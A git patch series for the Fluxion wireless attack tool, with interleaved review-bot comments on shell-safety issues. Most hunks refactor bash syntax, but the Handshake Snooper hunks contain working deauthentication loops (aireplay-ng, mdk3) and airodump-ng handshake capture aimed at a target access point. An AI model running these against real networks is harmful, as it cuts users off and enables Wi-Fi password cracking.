@@ -1337,7 +1346,7 @@ function fluxion_set_attack() { local descriptions readarray -t descriptions < <( - head -n 3 attacks/*/language/$FLUXIONLanguage.sh | \ + head -n 3 attacks/*/language/$FluxionLanguage.sh | \ grep -E "^# description: " | sed -E 's/# \w+: //' ) @@ -1346,7 +1355,7 @@ function fluxion_set_attack() { local attack for attack in "${attacks[@]}"; do local identifier=$( - head -n 3 "attacks/$attack/language/$FLUXIONLanguage.sh" | \ + head -n 3 "attacks/$attack/language/$FluxionLanguage.sh" | \ grep -E "^# identifier: " | sed -E 's/# \w+: //' ) if [ "$identifier" ]; then identifiers+=("$identifier") @@ -1383,12 +1392,12 @@ function fluxion_prep_attack() { local -r path="$FLUXIONPath/attacks/$FluxionAttack" if [ ! -x "$path/attack.sh" ]; then return 1; fi - if [ ! -x "$path/language/$FLUXIONLanguage.sh" ]; then return 2; fi + if [ ! -x "$path/language/$FluxionLanguage.sh" ]; then return 2; fi # Load attack and its corresponding language file. # Notice: If the attack is a targetted attack, sourcing # will define the constant FLUXIONAttackTargetted. - source "$path/language/$FLUXIONLanguage.sh" + source "$path/language/$FluxionLanguage.sh" source "$path/attack.sh" if ! prep_attack "$@"; then @@ -1498,8 +1507,8 @@ function fluxion_main() { "run_attack" \ ) - while true # Fluxion's runtime-loop. - do fluxion_do_sequence fluxion sequence[@] + while true; do # Fluxion's runtime-loop. + fluxion_do_sequence fluxion sequence[@] done fluxion_shutdown From 7a61592df535535f8c08f39ac2994b2076e527c2 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Tue, 9 Jan 2018 15:20:11 -0600 Subject: [PATCH 11/45] Corrected subroutines to follow POSIX syntax. --- fluxion | 76 +++++++++++++++++++++++++++++---------------------------- 1 file changed, 39 insertions(+), 37 deletions(-) diff --git a/fluxion b/fluxion index f83c6d7..137213f 100755 --- a/fluxion +++ b/fluxion 
@@ -191,7 +191,7 @@ source "$FLUXIONPath/language/en.sh" # ============================================================ # # ================== < Startup & Shutdown > ================== # # ============================================================ # -function fluxion_startup() { +fluxion_startup() { if [ "$FLUXIONDebug" ]; then return 1; fi local banner=() @@ -271,7 +271,7 @@ function fluxion_startup() { echo -e "\n\n" # This echo is for spacing } -function fluxion_shutdown() { +fluxion_shutdown() { if [ $FLUXIONDebug ]; then return 1; fi # Show the header if the subroutine has already been loaded. @@ -360,12 +360,12 @@ function fluxion_shutdown() { # ================= < Handler Subroutines > ================== # # ============================================================ # # Delete log only in Normal Mode ! -function fluxion_conditional_clear() { +fluxion_conditional_clear() { # Clear iff we're not in debug mode if [ ! $FLUXIONDebug ]; then clear; fi } -function fluxion_conditional_bail() { +fluxion_conditional_bail() { echo ${1:-"Something went wrong, whoops! (report this)"} sleep 5 if [ ! $FLUXIONDebug ]; then @@ -385,7 +385,7 @@ if [ $FLUXIONDebug ]; then trap 'fluxion_error_report $LINENO' ERR fi -function fluxion_handle_abort_attack() { +fluxion_handle_abort_attack() { if [ $(type -t stop_attack) ]; then stop_attack &> $FLUXIONOutputDevice unprep_attack &> $FLUXIONOutputDevice @@ -397,7 +397,7 @@ function fluxion_handle_abort_attack() { # In case of abort signal, abort any attacks currently running. trap fluxion_handle_abort_attack SIGABRT -function fluxion_handle_exit() { +fluxion_handle_exit() { fluxion_handle_abort_attack fluxion_shutdown exit 1 
@@ -410,7 +410,7 @@ trap fluxion_handle_exit SIGINT SIGHUP # ============================================================ # # =============== < Resolution & Positioning > =============== # # ============================================================ # -function fluxion_set_resolution() { # Windows + Resolution +fluxion_set_resolution() { # Windows + Resolution # Calc options RATIO=4 @@ -467,7 +467,7 @@ declare -rA FLUXIONUndoable=( \ # Yes, I know, the identifiers are fucking ugly. If only we had # some type of mangling with bash identifiers, that'd be great. -function fluxion_do() { +fluxion_do() { if [ ${#@} -lt 2 ]; then return -1; fi local -r __fluxion_do__namespace=$1 @@ -478,7 +478,7 @@ function fluxion_do() { return $? } -function fluxion_undo() { +fluxion_undo() { if [ ${#@} -ne 1 ]; then return -1; fi local -r __fluxion_undo__namespace=$1 @@ -501,7 +501,7 @@ function fluxion_undo() { return -2 # The undo-chain failed. } -function fluxion_done() { +fluxion_done() { if [ ${#@} -ne 1 ]; then return -1; fi local -r __fluxion_done__namespace=$1 @@ -511,7 +511,7 @@ function fluxion_done() { if [ ! "$FluxionDone" ]; then return 1; fi } -function fluxion_done_reset() { +fluxion_done_reset() { if [ ${#@} -ne 1 ]; then return -1; fi local -r __fluxion_done_reset__namespace=$1 @@ -519,7 +519,7 @@ function fluxion_done_reset() { eval FXDLog_$__fluxion_done_reset__namespace=\(\) } -function fluxion_do_sequence() { +fluxion_do_sequence() { if [ ${#@} -ne 2 ]; then return -1; fi # TODO: Implement an alternative, better method of doing @@ -568,7 +568,7 @@ function fluxion_do_sequence() { # ============================================================ # # ================= < Load All Subroutines > ================= # # ============================================================ # -function fluxion_header() { +fluxion_header() { format_apply_autosize "[%*s]\n" local verticalBorder=$FormatApplyAutosize 
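Review bot: `eval FXDLog_$__fluxion_done_reset__namespace=\(\)` in the `@@ -519,7 +519,7 @@` hunk passes the caller's first argument through `eval`, with only the argument-count check from the preceding hunk in front of it. The only namespace visible on this page is the literal `fluxion` handed to fluxion_do_sequence, so this is hardening rather than a live fault. A guard before the `eval`, `case "$1" in ""|*[!A-Za-z0-9_]*) return 1;; esac`, keeps the namespace to identifier characters. A one-line comment above the `eval` stating that the namespace must be a valid identifier suffix would document the contract.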
@@ -587,7 +587,7 @@ function fluxion_header() { } # ======================= < Language > ======================= # -function fluxion_unset_language() { +fluxion_unset_language() { FluxionLanguage="" if [ "$FLUXIONPreferencesFile" ]; then @@ -595,7 +595,7 @@ function fluxion_unset_language() { fi } -function fluxion_set_language() { +fluxion_set_language() { if [ ! "$FluxionLanguage" ]; then # Get all languages available. local languageCodes @@ -647,7 +647,7 @@ function fluxion_set_language() { # ====================== < Interfaces > ====================== # declare -A FluxionInterfaces=() # Global interfaces' registry. -function fluxion_deallocate_interface() { # Release interfaces +fluxion_deallocate_interface() { # Release interfaces if [ ! "$1" ] || ! interface_is_real $1; then return 1; fi local -r oldIdentifier=$1 @@ -691,7 +691,7 @@ function fluxion_deallocate_interface() { # Release interfaces # Return 3: Unable to determine interface's driver. # Return 4: Fluxion failed to reidentify interface. # Return 5: Interface allocation failed (identifier missing). -function fluxion_allocate_interface() { # Reserve interfaces +fluxion_allocate_interface() { # Reserve interfaces if [ ! "$1" ]; then return 1; fi local -r identifier=$1 @@ -838,7 +838,7 @@ function fluxion_allocate_interface() { # Reserve interfaces # ------------------------------------------------------------ # # Return -1: Go back # Return 1: Missing interfaces lambda identifier (not passed). -function fluxion_get_interface() { +fluxion_get_interface() { if ! type -t "$1" &> /dev/null; then return 1; fi while true; do 
@@ -925,7 +925,7 @@ function fluxion_get_interface() { # Return 2: Xterm failed to start airmon-ng. # Return 3: Invalid capture file was generated. # Return 4: No candidates were detected. -function fluxion_target_get_candidates() { +fluxion_target_get_candidates() { # Assure a valid wireless interface for scanning was given. if [ ! "$1" ] || ! interface_is_wireless "$1"; then return 1; fi @@ -989,7 +989,7 @@ function fluxion_target_get_candidates() { } -function fluxion_get_target() { +fluxion_get_target() { # Assure a valid wireless interface for scanning was given. if [ ! "$1" ] || ! interface_is_wireless "$1"; then return 1; fi @@ -1147,7 +1147,7 @@ function fluxion_get_target() { FluxionTargetRogueMAC="${FluxionTargetMAC::13}${rogueMACHex:1:1}${FluxionTargetMAC:14:4}" } -function fluxion_target_show() { +fluxion_target_show() { format_apply_autosize "%*s$CBlu%7s$CClr: %-32s%*s\n" local colorlessFormat="$FormatApplyAutosize" @@ -1165,7 +1165,7 @@ function fluxion_target_show() { # =================== < Hash Subroutines > =================== # # Parameters: [channel [encryption [maker]]] -function fluxion_hash_verify() { +fluxion_hash_verify() { if [ ${#@} -lt 3 ]; then return 1; fi local -r hashPath=$1 @@ -1238,12 +1238,12 @@ function fluxion_hash_verify() { if [ $hashResult -ne 0 ]; then return 1; fi } -function fluxion_hash_unset_path() { +fluxion_hash_unset_path() { FluxionHashPath="" } # Parameters: [channel [encryption [maker]]] -function fluxion_hash_set_path() { +fluxion_hash_set_path() { if [ "$FluxionHashPath" ]; then return 0; fi fluxion_hash_unset_path @@ -1308,7 +1308,7 @@ function fluxion_hash_set_path() { } # Paramters: -function fluxion_hash_get() { +fluxion_hash_get() { # Assure we've got the bssid and the essid passed in. if [ ${#@} -lt 2 ]; then return 1; fi 
@@ -1325,11 +1325,11 @@ function fluxion_hash_get() { # ================== < Attack Subroutines > ================== # -function fluxion_unset_attack() { +fluxion_unset_attack() { FluxionAttack="" } -function fluxion_set_attack() { +fluxion_set_attack() { if [ "$FluxionAttack" ]; then return 0; fi fluxion_unset_attack @@ -1380,7 +1380,7 @@ function fluxion_set_attack() { FluxionAttack=${IOQueryFormatFields[0]} } -function fluxion_unprep_attack() { +fluxion_unprep_attack() { if type -t unprep_attack &> /dev/null; then unprep_attack fi @@ -1388,7 +1388,7 @@ function fluxion_unprep_attack() { return 1 # Trigger another undo since prep isn't significant. } -function fluxion_prep_attack() { +fluxion_prep_attack() { local -r path="$FLUXIONPath/attacks/$FluxionAttack" if [ ! -x "$path/attack.sh" ]; then return 1; fi @@ -1399,6 +1399,8 @@ function fluxion_prep_attack() { # will define the constant FLUXIONAttackTargetted. source "$path/language/$FluxionLanguage.sh" source "$path/attack.sh" + + if if ! prep_attack "$@"; then fluxion_unprep_attack @@ -1406,7 +1408,7 @@ function fluxion_prep_attack() { fi } -function fluxion_run_attack() { +fluxion_run_attack() { start_attack local choices=( \ @@ -1436,7 +1438,7 @@ function fluxion_run_attack() { # ============================================================ # # =================== < Test Subroutines > =================== # # ============================================================ # -function subtest1() { +subtest1() { local interface interface_list_all for interface in "${InterfaceListAll[@]}"; do 
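Review bot: The `@@ -1399,6 +1399,8 @@` hunk adds a whitespace-only line and a bare `if` directly above `if ! prep_attack "$@"; then`. The extra keyword opens a compound command that has no `then` or `fi` of its own, so the file should no longer parse; both added lines should be dropped. Every other hunk of this commit only removes the `function` keyword, so this looks like an unfinished edit committed by accident. fluxion_prep_attack continues outside the hunk.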
@@ -1495,16 +1497,16 @@ shift # Remove "--" to prepare for attacks to read parameters. # ============================================================ # # ===================== < FLUXION Loop > ===================== # # ============================================================ # -function fluxion_main() { +fluxion_main() { fluxion_startup fluxion_set_resolution - local -r sequence=( \ - "set_language" \ - "set_attack" \ - "prep_attack" \ - "run_attack" \ + local -r sequence=( + "set_language" + "set_attack" + "prep_attack" + "run_attack" ) while true; do # Fluxion's runtime-loop. From 3185ca9ad8239ebea546b2420d27efed9b7a2b5b Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Wed, 10 Jan 2018 20:17:08 -0600 Subject: [PATCH 12/45] Added attack targetting, minor bug & styling fixes. Added optional targetting functionality for attacks opting to use it. Fixed bugs caused by line length reduction (improperly escaping line). Corrected old tick-marks to new sub-shell marks ($()). --- fluxion | 57 +++++++++++++++++++++++++++++++++++---------------------- 1 file changed, 35 insertions(+), 22 deletions(-) diff --git a/fluxion b/fluxion index 137213f..cba1b78 100755 --- a/fluxion +++ b/fluxion @@ -545,7 +545,7 @@ fluxion_do_sequence() { local __fluxion_do_sequence__instruction=${__fluxion_do_sequence__sequence[0]} while [ "$__fluxion_do_sequence__instruction" ]; do if ! fluxion_do $__fluxion_do_sequence__namespace $__fluxion_do_sequence__instruction; then - if ! fluxion_undo; then $__fluxion_do_sequence__namespace + if ! fluxion_undo $__fluxion_do_sequence__namespace; then $__fluxion_do_sequence__namespace break fi fi 
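Review bot: The corrected line in the `@@ -545,7 +545,7 @@` hunk still carries `$__fluxion_do_sequence__namespace` after `then`, so when `fluxion_undo` fails the namespace value is run as a command before `break`. The line should stop at the keyword: `if ! fluxion_undo "$__fluxion_do_sequence__namespace"; then`. fluxion_do_sequence starts and ends outside the hunk.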
@@ -745,7 +745,7 @@ fluxion_allocate_interface() { # Reserve interfaces # TODO: Make the loop below airmon-ng independent. # Maybe replace it with a list of network-managers? # WARNING: Version differences could break code below. - for program in "`airmon-ng check | awk 'NR>6{print $2}'`"; do + for program in "$(airmon-ng check | awk 'NR>6{print $2}')"; do killall "$program" &> $FLUXIONOutputDevice done fi @@ -849,7 +849,7 @@ fluxion_get_interface() { local interfacesAvailableState=() # Gather information from all available interfaces. - local -r interfacesAvailableCount=${#interfacesAvailable[@]} + local interfacesAvailableCount=${#interfacesAvailable[@]} local i for (( i = 0; i < interfacesAvailableCount; i++ )); do @@ -880,9 +880,10 @@ fluxion_get_interface() { # If only one interface exists and it's not unavailable, choose it. if [ "${#interfacesAvailable[@]}" -eq 1 -a \ "${interfacesAvailableState[0]}" != "[-]" ]; then - FluxionGetInterfaceSelected="${interfacesAvailable[0]}" - FluxionGetInterfaceSelectedState="${interfacesAvailableState[0]}" - FluxionGetInterfaceSelectedInfo="${interfacesAvailableInfo[0]}" + FluxionInterfaceSelected="${interfacesAvailable[0]}" + FluxionInterfaceSelectedState="${interfacesAvailableState[0]}" + FluxionInterfaceSelectedInfo="${interfacesAvailableInfo[0]}" + break else interfacesAvailable+=( \ "$FLUXIONGeneralRepeatOption" \ @@ -907,14 +908,14 @@ fluxion_get_interface() { case "${IOQueryFormatFields[1]}" in "$FLUXIONGeneralRepeatOption") continue;; "$FLUXIONGeneralBackOption") return -1;; - *) break;; + *) + FluxionInterfaceSelected="${IOQueryFormatFields[1]}" + FluxionInterfaceSelectedState="${IOQueryFormatFields[2]}" + FluxionInterfaceSelectedInfo="${IOQueryFormatFields[3]}" + break;; esac fi done - - FluxionInterfaceSelected="${IOQueryFormatFields[1]}" - FluxionInterfaceSelectedState="${IOQueryFormatFields[2]}" - FluxionInterfaceSelectedInfo="${IOQueryFormatFields[3]}" } 
@@ -970,11 +971,11 @@ fluxion_target_get_candidates() { # ) local -r matchMAC="([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]" readarray FluxionTargetCandidates < <( - awk -F, "NF==15 && length(\$1)==17 && \$1~/$matchMAC/ {print \$0}" + awk -F, "NF==15 && length(\$1)==17 && \$1~/$matchMAC/ {print \$0}" \ "$FLUXIONWorkspacePath/dump-01.csv" ) readarray FluxionTargetCandidatesClients < <( - awk -F, "NF==7 && length(\$1)==17 && \$1~/$matchMAC/ {print \$0}" + awk -F, "NF==7 && length(\$1)==17 && \$1~/$matchMAC/ {print \$0}" \ "$FLUXIONWorkspacePath/dump-01.csv" ) @@ -1089,10 +1090,10 @@ fluxion_get_target() { else # Bash doesn't support floating point division, work around it... # Q = ((P - F) / (C - F)); Q-quality, P-power, F-floor, C-Ceiling. - candidatesQuality[i]=$( - ((${candidatesPower[i]} * 10 - $FLUXIONNoiseFloor * 10) / \ - (($FLUXIONNoiseCeiling - $FLUXIONNoiseFloor) / 10)) - ) + candidatesQuality[i]=$(( \ + (${candidatesPower[i]} * 10 - $FLUXIONNoiseFloor * 10) / \ + (($FLUXIONNoiseCeiling - $FLUXIONNoiseFloor) / 10) \ + )) fi done @@ -1221,8 +1222,8 @@ fluxion_hash_verify() { hash_check_handshake \ "$verifier" \ "$hashPath" \ - "$APTargetSSID" \ - "$APTargetMAC" + "$hashESSID" \ + "$hashBSSID" local -r hashResult=$? @@ -1399,8 +1400,20 @@ fluxion_prep_attack() { # will define the constant FLUXIONAttackTargetted. source "$path/language/$FluxionLanguage.sh" source "$path/attack.sh" - - if + + # Check if attack is targetted & set the attack target. + if type -t attack_targetting_interfaces &> /dev/null; then + if ! fluxion_get_interface attack_targetting_interfaces; then + return 3 + fi + if ! fluxion_allocate_interface $FluxionInterfaceSelected; then + return 4 + fi + if ! fluxion_get_target \ + ${FluxionInterfaces[$FluxionInterfaceSelected]}; then + return 5 + fi + fi if ! prep_attack "$@"; then fluxion_unprep_attack 
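Review bot: In the `@@ -1089,10 +1090,10 @@` hunk `${candidatesPower[i]}` is expanded textually inside `$(( … ))`, and bash evaluates whatever text lands there as an arithmetic expression. Where the array is filled is outside the hunk; if it is parsed from the scan capture, a non-numeric field would be evaluated rather than rejected. Testing the element first with `[[ ${candidatesPower[i]} =~ ^-?[0-9]+$ ]]` and skipping the computation otherwise keeps the expression to integers. The enclosing loop and function begin and end outside the hunk.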
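Review bot: The targetting block added in the `@@ -1399,8 +1400,20 @@` hunk returns 5 when `fluxion_get_target` fails, after `fluxion_allocate_interface` has already succeeded, and nothing on that path releases the interface. Unless the caller's undo chain does it, the interface stays allocated; releasing it through fluxion_deallocate_interface before `return 5` would leave the system as it was found. `$FluxionInterfaceSelected` and `${FluxionInterfaces[$FluxionInterfaceSelected]}` are unquoted, so an empty selection silently changes the argument count; `"$FluxionInterfaceSelected"` and `"${FluxionInterfaces[$FluxionInterfaceSelected]}"` avoid that. What fluxion_unprep_attack undoes for the interface is not visible here.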
@@ -1417,7 +1430,7 @@ fluxion_run_attack() { ) io_query_choice \ - "`io_dynamic_output $FLUXIONAttackInProgressNotice`" choices[@] + "$(io_dynamic_output $FLUXIONAttackInProgressNotice)" choices[@] echo From fb70dc01583cfe8de68dcacc1a6209c0dc7e13fb Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Thu, 11 Jan 2018 00:20:41 -0600 Subject: [PATCH 13/45] Handshake Snooper migration & bash bug workaround. Started upgrade of Handshake Snooper to fluxion 4. Redefined array constants as variables due to bash bug discovered. --- attacks/Handshake Snooper/attack.sh | 281 +++++++++++++++++++--------- fluxion | 22 ++- 2 files changed, 203 insertions(+), 100 deletions(-) diff --git a/attacks/Handshake Snooper/attack.sh b/attacks/Handshake Snooper/attack.sh index 84c39a3..2f9aff3 100755 --- a/attacks/Handshake Snooper/attack.sh +++ b/attacks/Handshake Snooper/attack.sh 
@@ -1,12 +1,27 @@ #!/bin/bash -########################### < Handshake Snooper Parameters > ########################### +# ============================================================ # +# ============= < Handshake Snooper Parameters > ============= # +# ============================================================ # HandshakeSnooperState="Not Ready" -################################# < Handshake Snooper > ################################ -function handshake_snooper_arbiter_daemon() { - if [ ${#@} -lt 1 -o "$HandshakeSnooperState" != "Running" ]; then return 1; fi + +# ============================================================ # +# ========= < Handshake Snooper Helper Subroutines > ========= # +# ============================================================ # +handshake_snooper_header() { + fluxion_header; fluxion_target_show; echo +} + + +# ============================================================ # +# ============= < Handshake Snooper Subroutines > ============ # +# ============================================================ # +handshake_snooper_arbiter_daemon() { + if [ ${#@} -lt 1 -o "$HandshakeSnooperState" != "Running" ]; then + return 1; + fi # Start daemon in the running state to continue execution until aborted, # or until a hash has been verified to exist in the capture file. 
@@ -15,13 +30,16 @@ function handshake_snooper_arbiter_daemon() { function handshake_snooper_arbiter_daemon_abort() { handshake_snooper_arbiter_daemon_state="aborted" - if [ "$handshake_snooper_arbiter_daemon_viewerPID" ]; then kill $handshake_snooper_arbiter_daemon_viewerPID + if [ "$handshake_snooper_arbiter_daemon_viewerPID" ]; then + kill $handshake_snooper_arbiter_daemon_viewerPID fi handshake_snooper_stop_deauthenticator handshake_snooper_stop_captor - echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperArbiterAbortedWarning" >>"$FLUXIONWorkspacePath/handshake_snooper.log" + local -r now=$(env -i date '+%H:%M:%S') + echo -e "[$now] $HandshakeSnooperArbiterAbortedWarning" >> \ + "$FLUXIONWorkspacePath/handshake_snooper.log" exit 2 } @@ -34,10 +52,14 @@ function handshake_snooper_arbiter_daemon() { sandbox_remove_workfile "$FLUXIONWorkspacePath/capture/dump-*" # Display some feedback to the user to assure verifier is working. - xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg "#000000" -fg "#CCCCCC" -title "Handshake Snooper Arbiter Log" -e "tail -f \"$FLUXIONWorkspacePath/handshake_snooper.log\"" & + xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg "#000000" -fg "#CCCCCC" \ + -title "Handshake Snooper Arbiter Log" -e \ + "tail -f \"$FLUXIONWorkspacePath/handshake_snooper.log\"" & local handshake_snooper_arbiter_daemon_viewerPID=$! - echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperStartingArbiterNotice" >"$FLUXIONWorkspacePath/handshake_snooper.log" + local now=$(env -i date '+%H:%M:%S') + echo -e "[$now] $HandshakeSnooperStartingArbiterNotice" > \ + "$FLUXIONWorkspacePath/handshake_snooper.log" handshake_snooper_start_captor handshake_snooper_start_deauthenticator 
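Review bot: `local -r now=$(env -i date '+%H:%M:%S')` in the abort handler (`@@ -15,13 +30,16 @@`) combines declaration and command substitution, so a failing `date` is hidden behind `local`'s own exit status; `local now=$(…)` in the `@@ -34,10 +52,14 @@` hunk has the same shape. Declaring first and assigning on the next line, `local now` then `now=$(env -i date '+%H:%M:%S')`, keeps the status. The nested handler also still uses the `function` keyword that the earlier commit removed everywhere else. Separately, the log is opened with `>` at the fixed name `handshake_snooper.log` under `$FLUXIONWorkspacePath`; if that directory sits in a shared temporary location, creating it with `mktemp -d` under a restrictive umask avoids writing through a path someone else prepared.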
@@ -46,26 +68,38 @@ function handshake_snooper_arbiter_daemon() { # Keep snooping and verifying until we've got a valid hash from the capture file. while [ $handshake_snooper_arbiter_daemon_verified -ne 0 ]; do - echo -e "[$(env -i date '+%H:%M:%S')] $(io_dynamic_output $HandshakeSnooperSnoopingForNSecondsNotice)" >>"$FLUXIONWorkspacePath/handshake_snooper.log" + now=$(env -i date '+%H:%M:%S') + echo -e "[$now] $(io_dynamic_output $HandshakeSnooperSnoopingForNSecondsNotice)" >> \ + "$FLUXIONWorkspacePath/handshake_snooper.log" sleep $HANDSHAKEVerifierInterval & wait $! # Using wait to asynchronously catch flags while waiting. # If synchronously searching, stop the captor and deauthenticator before checking. if [ "$HANDSHAKEVerifierSynchronicity" = "blocking" ]; then - echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperStoppingForVerifierNotice" >>"$FLUXIONWorkspacePath/handshake_snooper.log" + now=$(env -i date '+%H:%M:%S') + echo -e "[$now] $HandshakeSnooperStoppingForVerifierNotice" >> \ + "$FLUXIONWorkspacePath/handshake_snooper.log" handshake_snooper_stop_deauthenticator handshake_snooper_stop_captor - mv "$FLUXIONWorkspacePath/capture/dump-01.cap" "$FLUXIONWorkspacePath/capture/recent.cap" + mv "$FLUXIONWorkspacePath/capture/dump-01.cap" \ + "$FLUXIONWorkspacePath/capture/recent.cap" else - pyrit -r "$FLUXIONWorkspacePath/capture/dump-01.cap" -o "$FLUXIONWorkspacePath/capture/recent.cap" stripLive &>$FLUXIONOutputDevice + pyrit -r "$FLUXIONWorkspacePath/capture/dump-01.cap" \ + -o "$FLUXIONWorkspacePath/capture/recent.cap" stripLive &> \ + $FLUXIONOutputDevice fi - echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperSearchingForHashesNotice" >>"$FLUXIONWorkspacePath/handshake_snooper.log" - hash_check_handshake "$HANDSHAKEVerifierIdentifier" "$FLUXIONWorkspacePath/capture/recent.cap" "$APTargetSSID" "$APTargetMAC" + now=$(env -i date '+%H:%M:%S') + echo -e "[$now] $HandshakeSnooperSearchingForHashesNotice" >> \ + 
"$FLUXIONWorkspacePath/handshake_snooper.log" + hash_check_handshake "$HANDSHAKEVerifierIdentifier" \ + "$FLUXIONWorkspacePath/capture/recent.cap" \ + "$APTargetSSID" "$APTargetMAC" handshake_snooper_arbiter_daemon_verified=$? # If synchronously searching, restart the captor and deauthenticator after checking. - if [ "$HANDSHAKEVerifierSynchronicity" = "blocking" -a $handshake_snooper_arbiter_daemon_verified -ne 0 ]; then + if [ "$HANDSHAKEVerifierSynchronicity" = "blocking" -a \ + $handshake_snooper_arbiter_daemon_verified -ne 0 ]; then sandbox_remove_workfile "$FLUXIONWorkspacePath/capture/*" handshake_snooper_start_captor 
@@ -78,33 +112,38 @@ function handshake_snooper_arbiter_daemon() { handshake_snooper_stop_captor local completionTime=$(env -i date '+%H:%M:%S') - echo -e "[$completionTime] $HandshakeSnooperArbiterSuccededNotice" >>"$FLUXIONWorkspacePath/handshake_snooper.log" - echo -e "[$completionTime] $HandshakeSnooperArbiterCompletedTip" >>"$FLUXIONWorkspacePath/handshake_snooper.log" + echo -e "[$completionTime] $HandshakeSnooperArbiterSuccededNotice" >> \ + "$FLUXIONWorkspacePath/handshake_snooper.log" + echo -e "[$completionTime] $HandshakeSnooperArbiterCompletedTip" >> \ + "$FLUXIONWorkspacePath/handshake_snooper.log" # Assure we've got a directory to store hashes into. mkdir -p "$FLUXIONPath/attacks/Handshake Snooper/handshakes/" # Move handshake to storage if one was acquired. - mv "$FLUXIONWorkspacePath/capture/recent.cap" "$FLUXIONPath/attacks/Handshake Snooper/handshakes/$APTargetSSIDClean-$APTargetMAC.cap" + mv "$FLUXIONWorkspacePath/capture/recent.cap" \ + "$FLUXIONPath/attacks/Handshake Snooper/handshakes/$APTargetSSIDClean-$APTargetMAC.cap" # Signal parent process the verification terminated. 
kill -s SIGABRT $1 } -function handshake_snooper_stop_captor() { - if [ "$HANDSHAKECaptorPID" ]; then kill -s SIGINT $HANDSHAKECaptorPID &>$FLUXIONOutputDevice +handshake_snooper_stop_captor() { + if [ "$HANDSHAKECaptorPID" ]; then + kill -s SIGINT $HANDSHAKECaptorPID &> $FLUXIONOutputDevice fi HANDSHAKECaptorPID="" } -function handshake_snooper_start_captor() { +handshake_snooper_start_captor() { if [ "$HANDSHAKECaptorPID" ]; then return 0; fi if [ "$HandshakeSnooperState" != "Running" ]; then return 1; fi handshake_snooper_stop_captor - xterm $FLUXIONHoldXterm -title "Handshake Captor (CH $APTargetChannel)" $TOPLEFT -bg "#000000" -fg "#FFFFFF" -e \ + xterm $FLUXIONHoldXterm -title "Handshake Captor (CH $APTargetChannel)" \ + $TOPLEFT -bg "#000000" -fg "#FFFFFF" -e \ airodump-ng --ignore-negative-one -d $APTargetMAC -w "$FLUXIONWorkspacePath/capture/dump" -c $APTargetChannel -a $WIMonitor & local parentPID=$! @@ -115,14 +154,14 @@ function handshake_snooper_start_captor() { done } -function handshake_snooper_stop_deauthenticator() { +handshake_snooper_stop_deauthenticator() { if [ "$HANDSHAKEDeauthenticatorPID" ]; then kill $HANDSHAKEDeauthenticatorPID &>$FLUXIONOutputDevice fi HANDSHAKEDeauthenticatorPID="" } -function handshake_snooper_start_deauthenticator() { +handshake_snooper_start_deauthenticator() { if [ "$HANDSHAKEDeauthenticatorPID" ]; then return 0; fi if [ "$HandshakeSnooperState" != "Running" ]; then return 1; fi 
@@ -130,75 +169,90 @@ function handshake_snooper_start_deauthenticator() { # Prepare deauthenticators case "$HANDSHAKEDeauthenticatorIdentifier" in - "$HandshakeSnooperMdk3MethodOption") echo "$APTargetMAC" >$FLUXIONWorkspacePath/mdk3_blacklist.lst ;; + "$HandshakeSnooperMdk3MethodOption") + echo "$APTargetMAC" > $FLUXIONWorkspacePath/mdk3_blacklist.lst ;; esac # Start deauthenticators. case "$HANDSHAKEDeauthenticatorIdentifier" in - "$HandshakeSnooperAireplayMethodOption") - xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \ - "while true; do sleep 7; timeout 3 aireplay-ng --deauth=100 -a $APTargetMAC --ignore-negative-one $WIMonitor; done" & - HANDSHAKEDeauthenticatorPID=$! + "$HandshakeSnooperAireplayMethodOption") + xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" \ + -title "Deauthenticating all clients on $APTargetSSID" -e \ + "while true; do sleep 7; timeout 3 aireplay-ng --deauth=100 -a $APTargetMAC --ignore-negative-one $WIMonitor; done" & + HANDSHAKEDeauthenticatorPID=$! ;; - "$HandshakeSnooperMdk3MethodOption") - xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \ - "while true; do sleep 7; timeout 3 mdk3 $WIMonitor d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $APTargetChannel; done" & - HANDSHAKEDeauthenticatorPID=$! + "$HandshakeSnooperMdk3MethodOption") + xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" \ + -title "Deauthenticating all clients on $APTargetSSID" -e \ + "while true; do sleep 7; timeout 3 mdk3 $WIMonitor d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $APTargetChannel; done" & + HANDSHAKEDeauthenticatorPID=$! 
;; esac } -function handshake_snooper_unset_deauthenticator_identifier() { +handshake_snooper_unset_deauthenticator_identifier() { HANDSHAKEDeauthenticatorIdentifier="" } -function handshake_snooper_set_deauthenticator_identifier() { +handshake_snooper_set_deauthenticator_identifier() { if [ "$HANDSHAKEDeauthenticatorIdentifier" ]; then return 0; fi handshake_snooper_unset_deauthenticator_identifier - local methods=("$HandshakeSnooperMonitorMethodOption" "$HandshakeSnooperAireplayMethodOption" "$HandshakeSnooperMdk3MethodOption" "$FLUXIONGeneralBackOption") + local methods=( + "$HandshakeSnooperMonitorMethodOption" + "$HandshakeSnooperAireplayMethodOption" + "$HandshakeSnooperMdk3MethodOption" + "$FLUXIONGeneralBackOption" + ) io_query_choice "$HandshakeSnooperMethodQuery" methods[@] HANDSHAKEDeauthenticatorIdentifier=$IOQueryChoice echo - if [ "$HANDSHAKEDeauthenticatorIdentifier" = "$FLUXIONGeneralBackOption" ]; then + if [ "$HANDSHAKEDeauthenticatorIdentifier" = \ + "$FLUXIONGeneralBackOption" ]; then handshake_snooper_unset_deauthenticator_identifier return 1 fi } -function handshake_snooper_unset_verifier_identifier() { +handshake_snooper_unset_verifier_identifier() { HANDSHAKEVerifierIdentifier="" } -function handshake_snooper_set_verifier_identifier() { +handshake_snooper_set_verifier_identifier() { if [ "$HANDSHAKEVerifierIdentifier" ]; then return 0; fi 